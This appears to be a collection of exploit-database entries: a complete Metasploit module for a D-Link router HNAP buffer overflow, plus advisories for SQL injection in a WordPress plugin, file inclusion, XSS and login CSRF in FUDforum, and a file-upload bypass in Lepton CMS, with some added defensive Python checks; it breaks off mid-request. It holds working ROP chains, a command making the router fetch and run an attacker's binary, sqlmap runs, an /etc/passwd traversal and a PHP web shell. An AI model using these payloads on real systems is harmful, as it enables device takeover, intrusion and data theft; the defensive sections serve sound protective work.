
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Payload working status:
# MIPS:
#   - all valid payloads working (the ones that we are able to send without null bytes)
# ARM:
#  - inline rev/bind shell works (bind... meh sometimes)
#  - stager rev/bind shell FAIL
#  - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb...

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow',
      'Description'    => %q{
        Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which
        is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol,
        which accepts arbitrarily long strings into certain XML parameters and then copies them into
        the stack.
        This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested
        using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and
        this vulnerability is present in both MIPS and ARM devices.
        The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a
        few load and store instructions. Because of this the payloads have to be sent unencoded, which
        can cause them to fail, although the bind shell seems to work well.
        For the ARM devices, the inline reverse tcp seems to work best.
        Check the reference links to see the vulnerable firmware versions.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['linux'],
      'References'     =>
        [
          ['CVE', '2016-6563'],
          ['US-CERT-VU', '677427'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt'],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Nov/38']
        ],
      'DefaultOptions' => { 'WfsDelay' => 10 },
      'Stance'         => Msf::Exploit::Stance::Aggressive,          # we need this to run in the foreground (ARM target)
      'Targets'        =>
        [
          [ 'Dlink DIR-818 / 822 / 823 / 850 [MIPS]',
            {
              'Offset'         => 3072,
              'LibcBase'       => 0x2aabe000,         # should be the same offset for all firmware versions and all routers
              'Sleep'          => 0x56DF0,            # sleep() offset into libuClibc-0.9.30.3.so
              'FirstGadget'    => 0x4EA1C,            # see comments below for gadget information
              'SecondGadget'   => 0x2468C,
              'ThirdGadget'    => 0x41f3c,
              'PrepShellcode1' => "\x23\xbd\xf3\xc8", # addi  sp,sp,-3128
              'PrepShellcode2' => "\x03\xa0\xf8\x09", # jalr  sp
              'BranchDelay'    => "\x20\x84\xf8\x30", # addi  a0,a0,-2000 (nop)
              'Arch'           => ARCH_MIPSBE,
              'Payload'        =>
                {
                  'BadChars' => "\x00",
                  'EncoderType'     => Msf::Encoder::Type::Raw      # else it will fail with SIGILL, this CPU is crippled
                },
            }
          ],
          [ 'Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]',
            {
              'Offset'         => 1024,
              'LibcBase'       => 0x400DA000,         # we can pick any xyz in 0x40xyz000 (an x of 0/1 works well)
              'System'         => 0x5A270,            # system() offset into libuClibc-0.9.32.1.so
              'FirstGadget'    => 0x18298,            # see comments below for gadget information
              'SecondGadget'   => 0x40CB8,
              'Arch'           => ARCH_ARMLE,
            }
          ],
        ],
      'DisclosureDate'  => 'Nov 7 2016',
      'DefaultTarget'   => 0))
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']),
        OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']),
        OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']),
        OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']),
        OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']),
      ], self.class)
  end

  def check
    begin
      res = send_request_cgi({
        'uri'     => '/HNAP1/',
        'method'  => 'POST',
        'Content-Type' => 'text/xml',
        'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' }
      })

      if res && res.code == 500
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  def calc_encode_addr (offset, big_endian = true)
    if big_endian
      [(target['LibcBase'] + offset).to_s(16)].pack('H*')
    else
      [(target['LibcBase'] + offset).to_s(16)].pack('H*').reverse
    end
  end

  def prepare_shellcode_arm (cmd)
    #All these gadgets are from /lib/libuClibc-0.9.32.1.so, which is the library used for all versions of firmware for all ARM routers

    #first_gadget (pops system() address into r3, and second_gadget into PC):
    #.text:00018298                 LDMFD           SP!, {R3,PC}

    #second_gadget (puts the stack pointer into r0 and calls system() at r3):
    #.text:00040CB8                 MOV             R0, SP
    #.text:00040CBC                 BLX             R3

    #system() (Executes argument in r0 (our stack pointer)
    #.text:0005A270 system

    #The final payload will be:
    #'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command
    shellcode = rand_text_alpha(target['Offset']) +       # filler
      "\xff\xff\xff\xff" +                                # n integer overwrite (see advisory)
      rand_text_alpha(16) +                               # moar filler
      rand_text_alpha(4) +                                # r11
      calc_encode_addr(target['FirstGadget'], false) +    # first_gadget
      calc_encode_addr(target['System'], false) +         # system() address
      calc_encode_addr(target['SecondGadget'], false) +   # second_gadget
      cmd                                                 # our command
  end

  def prepare_shellcode_mips
    #All these gadgets are from /lib/libuClibc-0.9.30.3.so, which is the library used for all versions of firmware for all MIPS routers

    #<sleep> is at 56DF0

    #first gadget - execute sleep and call second_gadget
    #.text:0004EA1C                 move    $t9, $s0 <- sleep()
    #.text:0004EA20                 lw      $ra, 0x20+var_4($sp) <- second_gadget
    #.text:0004EA24                 li      $a0, 2 <- arg for sleep()
    #.text:0004EA28                 lw      $s0, 0x20+var_8($sp)
    #.text:0004EA2C                 li      $a1, 1
    #.text:0004EA30                 move    $a2, $zero
    #.text:0004EA34                 jr      $t9
    #.text:0004EA38                 addiu   $sp, 0x20

    #second gadget - put stack pointer in a1:
    #.text:0002468C                 addiu   $s1, $sp, 0x58
    #.text:00024690                 li      $s0, 0x44
    #.text:00024694                 move    $a2, $s0
    #.text:00024698                 move    $a1, $s1
    #.text:0002469C                 move    $t9, $s4
    #.text:000246A0                 jalr    $t9
    #.text:000246A4                 move    $a0, $s2

    #third gadget - call $a1 (stack pointer):
    #.text:00041F3C                 move    $t9, $a1
    #.text:00041F40                 move    $a1, $a2
    #.text:00041F44                 addiu   $a0, 8
    #.text:00041F48                 jr      $t9
    #.text:00041F4C                 nop

    #When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (2000+ bytes), we can jump back to the beginning of the buffer.
      #prep_shellcode_1:  23bdf3c8  addi  sp,sp,-3128
      #prep_shellcode_2:  03a0f809  jalr  sp
      #branch_delay:    2084f830  addi  a0,a0,-2000

    #The final payload will be:
    #shellcode + 'a' * (2064 - shellcode.size) + sleep() + '%31' * 4 + '%32' * 4 + '%33' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay
    shellcode = payload.encoded +                                        # exploit
      rand_text_alpha(target['Offset'] - payload.encoded.length) +       # filler
      calc_encode_addr(target['Sleep']) +                                # s0
      rand_text_alpha(4) +                                               # s1
      rand_text_alpha(4) +                                               # s2
      rand_text_alpha(4) +                                               # s3
      calc_encode_addr(target['ThirdGadget']) +                          # s4 (third gadget)
      calc_encode_addr(target['FirstGadget']) +                          # initial pc / ra (first_gadget)
      rand_text_alpha(0x1c) +                                            # filler
      calc_encode_addr(target['SecondGadget']) +                         # second_gadget
      rand_text_alpha(0x58) +                                            # filler
      target['PrepShellcode1'] +                                         # exploit prep
      target['PrepShellcode2'] +                                         # exploit prep
      target['BranchDelay']                                              # exploit prep
  end

  def send_payload (payload)
    begin
      # the payload can go in the Action, Username, LoginPassword or Captcha XML tag
      body = %{
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
 <soap:Body>
  <Login xmlns="http://purenetworks.com/HNAP1/">
   <Action>something</Action>
   <Username>Admin</Username>
   <LoginPassword></LoginPassword>
   <Captcha>#{payload}</Captcha>
  </Login>
 </soap:Body>
</soap:Envelope>
}

      res = send_request_cgi({
        'uri'     => '/HNAP1/',
        'method'  => 'POST',
        'ctype' => 'text/xml',
        'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' },
        'data' => body
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
    end
  end

  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    #print_status("on_request_uri called: #{request.inspect}")
    if (not @pl)
      print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{peer} - Sending the payload to the device...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  def exploit
    print_status("#{peer} - Attempting to exploit #{target.name}")
    if target == targets[0]
      send_payload(prepare_shellcode_mips)
    else
      downfile = rand_text_alpha(8+rand(8))
      @pl = generate_payload_exe
      @elf_sent = false
      resource_uri = '/' + downfile

      #do not use SSL
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end

      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
      else
        srv_host = datastore['SRVHOST']
      end

      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
      print_status("#{peer} - Starting up our web service on #{service_url} ...")
      start_service({'Uri' => {
        'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
      }})

      datastore['SSL'] = true if ssl_restore
      print_status("#{peer} - Asking the device to download and execute #{service_url}")

      filename = rand_text_alpha_lower(rand(8) + 2)
      cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &"

      shellcode = prepare_shellcode_arm(cmd)

      print_status("#{peer} - \"Bypassing\" the device's ASLR. This might take up to 15 minutes.")
      counter = 0.00
      while (not @elf_sent)
        if counter % 50.00 == 0 && counter != 0.00
          print_status("#{peer} - Tried #{counter.to_i} times in #{(counter * datastore['SLEEP'].to_f).to_i} seconds.")
        end
        send_payload(shellcode)
        sleep datastore['SLEEP'].to_f     # we need to be in the LAN, so a low value  (< 1s) is fine
        counter += 1
      end
      print_status("#{peer} - The device downloaded the payload after #{counter.to_i} tries / #{(counter * datastore['SLEEP'].to_f).to_i} seconds.")
    end
  end
end
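
A defensive counterpart to the module above, added here as an example (it is not part of the original module or of Metasploit): it measures the four Login fields the module names (Action, Username, LoginPassword, Captcha) in an HNAP request and flags any that exceed a limit. The 128-byte limit and all function names are assumptions; the sample bodies are constructed filler, not payloads.

```python
import re

LOGIN_ACTION = "http://purenetworks.com/HNAP1/Login"   # SOAPAction value used above
LOGIN_FIELDS = (b"Action", b"Username", b"LoginPassword", b"Captcha")
MAX_FIELD_BYTES = 128   # assumed limit; tune to what legitimate clients send


def login_field_lengths(body: bytes) -> dict:
    """Measure each Login field on the raw bytes.

    No XML parser is used on purpose: an overflow attempt carries raw
    binary and is often not well-formed XML, so a strict parser would
    reject the body before the length could be checked.
    """
    lengths = {}
    for name in LOGIN_FIELDS:
        opening = re.search(rb"<" + name + rb"(?:\s[^>]*)?>", body)
        if opening is None:
            continue
        closing = body.find(b"</" + name + b">", opening.end())
        if closing == -1:
            # Truncated or malformed element: count to the end of the body.
            closing = len(body)
        lengths[name.decode()] = closing - opening.end()
    return lengths


def inspect_hnap_request(path: str, headers: dict, body: bytes) -> list:
    """Return sorted (field, size) pairs for oversized Login fields."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    action = hdrs.get("soapaction", "").strip().strip('"')
    if not path.startswith("/HNAP1") or action != LOGIN_ACTION:
        return []
    return sorted(
        (field, size)
        for field, size in login_field_lengths(body).items()
        if size > MAX_FIELD_BYTES
    )


def sample_login_body(captcha: bytes, close_tag: bool = True) -> bytes:
    """Constructed sample body with the element layout of the template above."""
    tail = b"</Captcha></Login></soap:Body></soap:Envelope>" if close_tag else b""
    return (
        b'<?xml version="1.0" encoding="utf-8"?>'
        b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        b'<soap:Body><Login xmlns="http://purenetworks.com/HNAP1/">'
        b"<Action>request</Action><Username>Admin</Username>"
        b"<LoginPassword></LoginPassword><Captcha>" + captcha + tail
    )


if __name__ == "__main__":
    hdr = {"SOAPAction": '"http://purenetworks.com/HNAP1/Login"'}
    for label, body in [
        ("normal login", sample_login_body(b"ab12")),
        ("oversized Captcha", sample_login_body(b"A" * 3100)),
        ("truncated binary field", sample_login_body(b"\xff" * 500, close_tag=False)),
    ]:
        print(label, "->", inspect_hnap_request("/HNAP1/", hdr, body) or "ok")
```

The same length test can run in a reverse proxy or IDS rule in front of the LAN-side web interface; it does not replace a firmware update.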
            
# Exploit Title: Olimometer Plugin for WordPress – Sql Injection
# Date: 14/11/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/olimometer/
# Software Link: https://wordpress.org/plugins/olimometer/
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
# Tested on: Debian 8


1 - Description

# Vulnerable parameter: olimometer_id=

Parameter: olimometer_id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: olimometer_id=1 AND 6227=6227

     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind
     Payload: olimometer_id=1 AND SLEEP(5)

Using GET SQL Method with the "olimometer_id" parameter, we were able to
get the database name from the EXAMPLE.COM website. By further running
SQL Map using different arguments, we would be able to get the complete
database, including usernames and passwords if there are such.

2. Proof of Concept

Using the website EXAMPLE.COM for example, we can fire up sqlmap and set
the full path to the vulnerable parameter:

root@kali:~# sqlmap -u http://EXAMPLE.COM/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 --dbs --threads=5 --random-agent --no-cast

---
Parameter: olimometer_id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: olimometer_id=1 AND 6227=6227

     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind
     Payload: olimometer_id=1 AND SLEEP(5)
---
[11:14:21] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[11:14:21] [INFO] fetching database names
[11:14:21] [INFO] fetching number of databases
[11:14:21] [INFO] retrieved:
[11:14:21] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[11:14:21] [WARNING] (case) time-based comparison requires larger
statistical model, please wait.............................. (done)
[11:14:26] [WARNING] it is very important to not stress the network
adapter during usage of time-based payloads to prevent potential disruptions
[11:14:26] [ERROR] unable to retrieve the number of databases
[11:14:26] [INFO] falling back to current database
[11:14:26] [INFO] fetching current database
[11:14:26] [INFO] retrieving the length of query output
[11:14:26] [INFO] retrieved:
[11:14:28] [INFO] heuristics detected web page charset 'ascii'
14
[11:15:26] [INFO] retrieved: *****_wrdp1
available databases [1]:
[*] *****_wrdp1

We can see that we have successfully discovered one available database
with the name: "*****_wrdp1"

3. Type of vulnerability:

An SQL Injection vulnerability in Olimometer allows attackers to read
arbitrary data from the database.

4. Exploitation vector:

The url parameter 'olimometer_id=' of the
/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 is
vulnerable to SQLI.

5. Attack outcome:

An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access to the filesystem may be possible.

6. Impact:

Critical

7. Software/Product name:

Olimometer Plugin for WordPress

8. Affected versions:

<= 2.56

9. Fixed in version:

Not fixed at the date of submitting that exploit.

10. Vendor:

oshingler

11. CVE number:

Not existing
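
Since the advisory lists no fixed version, one way to spot attempts against the olimometer_id parameter is to scan web server access logs, shown here as an added example that is not part of the original advisory. It assumes combined-format log lines and that a legitimate olimometer_id is a short decimal number; the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

PLUGIN_PATH = "/wp-content/plugins/olimometer/thermometer.php"

# Combined log format; the request target is matched lazily so that
# unencoded spaces inside the query string do not break the parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[0-9.]+" (?P<status>\d{3})'
)
VALID_ID = re.compile(r"[0-9]{1,10}")   # assumption: ids are short decimal numbers


def flag_olimometer_requests(log_lines):
    """Return (client, timestamp, decoded value) for every non-numeric olimometer_id."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        try:
            url = urlsplit(m.group("target"))
        except ValueError:
            continue
        if not url.path.lower().endswith(PLUGIN_PATH):
            continue
        # parse_qs percent-decodes names and values, so encoded payloads
        # and encoded parameter names are compared in decoded form.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("olimometer_id", []):
            if not VALID_ID.fullmatch(value):
                findings.append((m.group("ip"), m.group("ts"), value))
    return findings


# Constructed sample lines; addresses come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Nov/2016:11:14:20 +0000] "GET /wp-content/plugins/'
    'olimometer/thermometer.php?olimometer_id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Nov/2016:11:14:21 +0000] "GET /wp-content/plugins/'
    'olimometer/thermometer.php?olimometer_id=1%20AND%206227%3D6227 HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [14/Nov/2016:11:14:26 +0000] "GET /wp-content/plugins/'
    'olimometer/thermometer.php?olimometer_id=1+AND+SLEEP(5) HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.33 - - [14/Nov/2016:11:15:00 +0000] "GET /index.php?olimometer_id=abc '
    'HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, value in flag_olimometer_requests(SAMPLE_LOG):
        print(f"{ts}  {ip}  olimometer_id={value!r}")
```

The same "digits only" rule is what the plugin itself should enforce before the value reaches a query, for example by casting the parameter to an integer.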
            
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    FUDforum 3.0.6
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://fudforum.org/forum/
Vulnerability Type:  LFI
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 11/10/2016
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to local file inclusion. This allows an attacker to read arbitrary files that
the web user has access to.

Admin credentials are required.

3. Details

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description: The "file" parameter of the hlplist.php script is vulnerable to
directory traversal, which allows the viewing of arbitrary files.

Proof of Concept:

http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ=4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
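
The containment check that stops the directory traversal described in the advisory above, as an added example that is not FUDforum code and not part of the advisory. The function name resolve_help_file, the directory layout and the file names are hypothetical; the demo builds its own temporary tree.

```python
import os
import tempfile


def resolve_help_file(base_dir: str, requested: str) -> str:
    """Map a user-supplied file name to a path that is guaranteed to lie
    inside base_dir, or raise.

    realpath() collapses '..' segments and follows symlinks, so the
    comparison is made on the location that would actually be opened.
    """
    if "\x00" in requested:
        raise ValueError("NUL byte in file name")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath compares whole path components, so a sibling such as
    # 'help_old' is not mistaken for a child of 'help'.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the help directory")
    if not os.path.isfile(candidate):
        raise FileNotFoundError(requested)
    return candidate


def demo() -> dict:
    """Run the check against a constructed directory tree."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        help_dir = os.path.join(root, "help")
        os.makedirs(os.path.join(help_dir, "af"))
        os.makedirs(os.path.join(root, "help_old"))
        for path in (
            os.path.join(help_dir, "af", "intro.hlp"),
            os.path.join(root, "help_old", "x.hlp"),
            os.path.join(root, "secret.txt"),
        ):
            with open(path, "w") as fh:
                fh.write("constructed sample content")
        # A symlink inside the help directory that points outside it.
        os.symlink(os.path.join(root, "secret.txt"),
                   os.path.join(help_dir, "link.hlp"))

        requests = [
            "af/intro.hlp",
            "../../../../../../../../../../etc/passwd",   # value from the PoC URL
            "/etc/passwd",
            "../secret.txt",
            "../help_old/x.hlp",
            "link.hlp",
            "nope.hlp",
        ]
        for name in requests:
            try:
                resolve_help_file(help_dir, name)
                results[name] = "served"
            except ValueError:
                results[name] = "outside"
            except FileNotFoundError:
                results[name] = "missing"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{outcome:8} {name}")
```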
            
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    FUDforum 3.0.6
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://fudforum.org/forum/
Vulnerability Type:  XSS, Login CSRF
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 11/10/2016
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to multiple persistent XSS issues. This allows an attacker to steal cookies,
inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum
is vulnerable to Login-CSRF.

3. Details

XSS 1: Via Filename in Private Message

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in private messages is vulnerable
to persistent XSS.

Proof of Concept:

Send a PM to a user. Add an attachment, where the filename is:
'"><img src=no onerror=alert(1)>.jpg
When the recipient views the PM, the injected code will be executed.

XSS 2: Via Filename in Forum Posts

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in forum posts is vulnerable to
persistent XSS.

Proof of Concept:

Create a new forum post. Add an attachment, where the filename is:
'"><img src=no onerror=alert(1)>.jpg
When viewing the post the injected code will be executed.

XSS 3: Via Signature in User Profile

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When editing a profile, the signature is echoed unencoded, leading
to persistent XSS.

Proof of Concept:

Visit http://localhost/fudforum/index.php?t=register
As signature, use: '"></textarea><img src=no onerror=alert(1)>
The injected code is either executed when the user themselves edits their
profile - which may be exploited via login CSRF - or when an admin visits the
edit profile page located here:
http://localhost/fudforum/index.php?t=register&mod_id=6&&SQ=1a85a858f326ec6602cb6d78d698f60a

Login CSRF

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: The login of FUDForum does not have any CSRF protection. The
impact of this is low, but an attacker might get a victim to disclose sensitive
information by using CSRF to log the victim into an attacker-controlled
account. An example would be the accidental sending of a sensitive private
message while being logged into an account controlled by an attacker.
Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the
user area.

Proof of Concept:

<html>
  <body>
    <form action="http://localhost/fudforum/index.php?t=login" method="POST">
      <input type="hidden" name="login" value="admin" />
      <input type="hidden" name="password" value="admin" />
      <input type="hidden" name="SQ" value="0" />
      <input type="hidden" name="adm" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html
 
            
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:   LEPTON 2.2.2 stable
Fixed in:           2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website:     http://www.lepton-cms.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode:       Coordinated Release
CVE:                n/a
Credits             Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to code execution as it is possible to upload files with dangerous
type via the media manager.

3. Details

Upload of file with dangerous type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description: When uploading a file in the media tab, there is a client-side as
well as a server-side extension check. The server-side check can be bypassed by
including a valid extension before the desired extension, leading to code
execution or XSS.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken=099c871bbf640f2f91d2az1472132032 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: lep9131sessionid=8bgkd5rae5nhbn0jaac8jpkpc5
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------38397165016927337851258279296
Content-Length: 613

-----------------------------38397165016927337851258279296
Content-Disposition: form-data; name="action"

media_upload
-----------------------------38397165016927337851258279296
Content-Disposition: form-data; name="current_dir"

-----------------------------38397165016927337851258279296
Content-Disposition: form-data; name="upload[]"; filename="test.png.php5"
Content-Type: image/png

<?php passthru($_GET['x']);
-----------------------------38397165016927337851258279296
Content-Disposition: form-data; name="submit"

Upload File(s)
-----------------------------38397165016927337851258279296--

http://localhost/LEPTON_stable_2.2.2/upload/media/test.png.php5?x=id

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-Code-Execution-171.html
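
Why a name like test.png.php5 passes a server-side extension check, and a stricter check that rejects it, as an added example that is not Lepton's code and not part of the advisory. weak_extension_check is only a model of the bypass the advisory describes (a permitted extension placed before the real one); the allowlist and all function names are assumptions.

```python
import re
import secrets

ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}   # assumed allowlist
STEM_RE = re.compile(r"[a-z0-9][a-z0-9_-]{0,63}")


def weak_extension_check(filename: str) -> bool:
    """Model of the bypassable behaviour: accept the upload as soon as
    any dot-separated part of the name is a permitted extension."""
    suffixes = filename.lower().split(".")[1:]
    return any(s in ALLOWED_EXTENSIONS for s in suffixes)


def strict_extension_check(filename: str) -> bool:
    """Accept only names in which every dot-separated suffix is allowed.

    Checking just the last suffix is not enough either: some server
    configurations (for example Apache mod_mime with AddHandler) pick a
    handler from any extension in the name, so 'shell.php.png' can still
    be executed.
    """
    name = filename.strip().lower()
    if not name or any(ch in name for ch in "/\\\x00"):
        return False                       # path separators or NUL byte
    stem, *suffixes = name.split(".")
    if not suffixes or not STEM_RE.fullmatch(stem):
        return False                       # no extension, or dotfile such as .htaccess
    return all(s in ALLOWED_EXTENSIONS for s in suffixes)


def storage_name(filename: str) -> str:
    """Return a server-generated name for an accepted upload, so nothing
    from the client-supplied name except the vetted extension reaches disk."""
    if not strict_extension_check(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    extension = filename.strip().lower().rsplit(".", 1)[1]
    return f"{secrets.token_hex(16)}.{extension}"


if __name__ == "__main__":
    # Constructed sample names; the first is the file name from the PoC above.
    for name in ["test.png.php5", "shell.php.png", "photo.png",
                 ".htaccess", "test.png.", "../x.png"]:
        print(f"{name:16} weak={weak_extension_check(name)!s:5} "
              f"strict={strict_extension_check(name)}")
```

Serving the upload directory with script execution disabled is a second, independent layer for the same problem.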
 
            
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:   LEPTON 2.2.2 stable
Fixed in:           2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website:     http://www.lepton-cms.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode:       Coordinated Release
CVE:                n/a
Credits             Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to multiple SQL injections. The injections require a user account
with elevated privileges.

3. Details

SQL Injection: Search Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "terms" parameter of the page search is vulnerable to SQL
Injection. A user account with the right "Pages" is required to access this
feature.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken=3f7020b05ec343675b6b2z1472137594 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

